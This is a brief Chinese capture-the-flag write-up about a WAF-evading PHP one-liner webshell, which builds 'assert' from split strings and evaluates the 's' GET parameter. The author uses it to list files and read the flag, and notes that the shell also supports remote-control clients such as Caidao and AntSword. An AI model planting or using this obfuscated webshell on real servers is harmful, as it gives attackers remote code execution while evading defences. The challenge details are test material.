过狗一句话
$poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
这咋啥也没有呢
从提示的过狗一句话,猜测传参为s
这里居然是一个命令执行漏洞
两个文件
flaga15808abee46a1d5.txt
index.php
把这两个玩意都看一遍
在这里得到flag
在这里看到过狗一句话
这里的过狗一句话有点意思,可以直接以参数传参的形式构建命令执行漏洞,实现菜刀和蚁剑的远程连接功能